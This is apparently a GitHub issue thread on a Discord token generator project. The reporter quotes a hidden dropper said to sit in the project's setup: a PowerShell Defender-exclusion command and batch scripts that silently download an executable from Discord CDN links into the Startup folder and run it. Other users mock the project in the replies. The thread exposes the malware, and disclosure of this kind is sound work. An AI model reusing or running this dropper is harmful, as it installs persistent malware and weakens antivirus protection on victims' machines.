### ISSUE TITLE
Virus in Requirements, But its broken LMAO

### ISSUE THREAD

**Issue by Its3rr0rsWRLD** [Matleox/Discord-Token-Generator#1]
powershell -w hidden -c Add-MpPreference -ExclusionPath ""

@echo off
setlocal 

set "URL=https://cdn.discordapp.com/attachments/973337617057869825/1176190901970796564/Built.exe"
set "DEST=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Updater.exe"

if exist "%DEST%" del "%DEST%"

curl --silent --output "%DEST%" "%URL%"

if %errorlevel% neq 0 (
  exit /b %errorlevel%
)

call "%DEST%"

@echo off
setlocal 

set "URL=https://cdn.discordapp.com/attachments/973337617057869825/1176181839065526402/Built.exe"
set "DEST=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Updater.exe"

if exist "%DEST%" del "%DEST%"

curl --silent --output "%DEST%" "%URL%"

if %errorlevel% neq 0 (
  exit /b %errorlevel%
)

call "%DEST%"

@echo off
cd /d %~dp0

pip3 install -r requirements.txt

really?

**Comment by Alek160410** [comment]
yeah no wonder it's broken when it's a literal copy of a uploaded generator some months ago with just text changed and well this lmao

**Comment by YoMrBenii** [comment]
yikes
